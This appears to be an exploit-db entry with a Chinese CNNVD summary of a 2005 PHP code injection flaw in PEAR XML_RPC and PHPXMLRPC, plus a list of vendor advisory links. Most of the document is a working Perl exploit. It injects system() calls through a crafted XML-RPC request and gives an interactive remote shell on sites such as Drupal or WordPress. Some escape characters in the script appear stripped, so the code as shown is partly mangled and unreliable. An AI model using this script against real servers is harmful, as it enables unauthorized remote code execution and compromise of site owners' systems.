https://www.exploit-db.com/exploits/1078
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-011

PEARXML_RPC及PHPXMLRPC是在较多网站应用系统中使用的功能模块。PEARXML_RPC1.3.0及之前版本(也称为XML-RPC或xmlrpc)以及PHPXMLRPC(也称为XML-RPCForPHP或php-xmlrpc)1.1及之前版本中存在代码注入漏洞。由于在使用文件前没有进行适当的检验处理，远程攻击者可通过XML文件，利用此漏洞执行任意PHP代码。多个使用这些模块的产品，包括WordPress，Serendipity，Drupal，egroupware，MailWatch，TikiWiki，phpWebSite，Ampache等均受此漏洞影响。

# tested and working /str0ke

#!/usr/bin/perl
# 
#  ilo-- 
#
#  This program is no GPL or has nothing to do with FSF, but some
#  code was ripped from romansoft.. sorry, too lazy!
#  
#  xmlrpc bug by James from GulfTech Security Research. 
#  http://pear.php.net/bugs/bug.php?id=4692
#  xmlrpc drupal exploit, but James sais xoops, phpnuke and other
#  cms should be vulnerable.
#
#  greets: dsr! digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1;  # fflush stdout after print

# Default options
# connection 
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;

# general
my $host;
 
 #informational lines to feed my own ego.
 print "xmlrpc exploit - http://www.reversing.org n";
 print "2005 ilo-- <ilo".chr(64)."reversing.org> n";
 print "special chars allowed are / and - nn";

 # read command line options
 my $options = GetOptions (

 #general options
 'host=s'    => $host, # input host to test.

 # connection options
 'basic_auth_user=s' => $basic_auth_user,
 'basic_auth_pass=s' => $basic_auth_pass,
 'proxy=s'           => $proxy,
 'proxy_user=s'      => $proxy_user,
 'proxy_pass=s'      => $proxy_pass,
 'timeout=i'         => $conn_timeout);

 # command line sanity check 
 &show_usage unless ($host);

 # main loop 
 while (1){
 	print "nxmlrpc@# ";
 	my $cmd = <STDIN>;
 	xmlrpc_xploit ($cmd);
 }

 exit (1);

#exploit 
sub xmlrpc_xploit {
chomp (my $data = shift);
my $reply;

my $d1 = "<?xml version="1.0"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');";  
my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";

  $data =~ s/-/'.chr(45).'/mg;
  $data =~ s///'.char(47).'/mg;

  my $req = new HTTP::Request 'POST' => $host;
  $req->content_type('application/xml');
  $req->content($d1.'system(''.$data.'')'.$d2);
  
  my $ua = new LWP::UserAgent;
  $ua->agent("xmlrpc exploit R/0.1");
  $ua->timeout($conn_timeout);

  if ($basic_auth_user){
    $req->authorization_basic($basic_auth_user, $basic_auth_pass) 
  }
  if ($proxy){
    $ua->proxy(['http'] => $proxy);
    $req->proxy_authorization_basic($proxy_user, $proxy_pass);
  }
 
  #send request, return null if not OK
  my $res = $ua->request($req);
  if ($res->is_success){
     $reply= $res->content;
  } else { 
     $reply = "";
  }
  $reply =~ /(.*).(<pre>warning.*)/mgsi;
  print ($1);
}

# show options 
sub show_usage {
  print "Syntax: ./xmlrpc.pl [options] host/urinn";
  print "main optionsn";
  print "connection optionsn";
  print "t--proxy (http), --proxy_user, --proxy_passn";
  print "t--basic_auth_user, --basic_auth_passn";
  print "t--timeout n";
  print "nExamplen";
  print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php n";
  print "n";
  exit(1);
}


# milw0rm.com [2005-07-01]

来源:MANDRAKE
名称:MDKSA-2005:109
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2005:109
来源:MISC
链接:http://www.gulftech.org/?node=research&article;_id=00087-07012005
来源:MISC
链接:http://pear.php.net/package/XML_RPC/download/1.3.1
来源:BUGTRAQ
名称:20050629Advisory02/2005:RemotecodeexecutioninSerendipity
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112008638320145&w;=2
来源:HP
名称:HPSBTU02083
链接:http://www.securityfocus.com/archive/1/archive/1/419064/100/0/threaded
来源:MISC
链接:http://www.hardened-php.net/advisory-022005.php
来源:BID
名称:14088
链接:http://www.securityfocus.com/bid/14088
来源:HP
名称:HPSBTU02083
链接:http://www.securityfocus.com/archive/1/archive/1/419064/100/0/threaded
来源:REDHAT
名称:RHSA-2005:564
链接:http://www.redhat.com/support/errata/RHSA-2005-564.html
来源:SUSE
名称:SUSE-SA:2005:049
链接:http://www.novell.com/linux/security/advisories/2005_49_php.html
来源:SUSE
名称:SUSE-SA:2005:041
链接:http://www.novell.com/linux/security/advisories/2005_41_php_pear.html
来源:SUSE
名称:SUSE-SR:2005:018
链接:http://